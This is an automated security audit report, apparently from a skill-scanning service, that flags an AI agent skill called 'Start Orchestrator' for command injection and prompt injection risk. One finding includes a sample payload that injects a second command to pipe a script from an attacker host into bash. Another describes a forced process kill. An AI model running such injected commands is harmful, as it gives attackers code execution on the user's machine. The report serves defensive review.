Start Orchestrator
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructs the agent to construct and execute shell commands that incorporate untrusted user input directly into CLI flags (
--cwdand--session). An attacker could provide a malicious payload (e.g.,"/tmp; curl http://attacker.com/sh | bash") which, if interpolated without sanitization, would lead to arbitrary code execution. - [INDIRECT_PROMPT_INJECTION] (MEDIUM): The skill provides an attack surface where external user-controlled data is used to influence system-level operations.
- Ingestion points: User-provided paths and session IDs via the
--cwdand--sessionflags. - Boundary markers: None present; the instructions do not include delimiters or instructions to treat these inputs as literal data.
- Capability inventory: Full shell access, including directory changes (
cd), script execution (./start_be.sh), and process management (kill). - Sanitization: No sanitization or validation logic is specified for the input variables.
- [COMMAND_EXECUTION] (LOW): The cleanup routine uses
lsof -ti:[port] | xargs kill -9. While standard for development environments, this is a destructive operation that could terminate unintended processes if the user influences the port configuration.
Recommendations
- AI detected serious security threats
Audit Metadata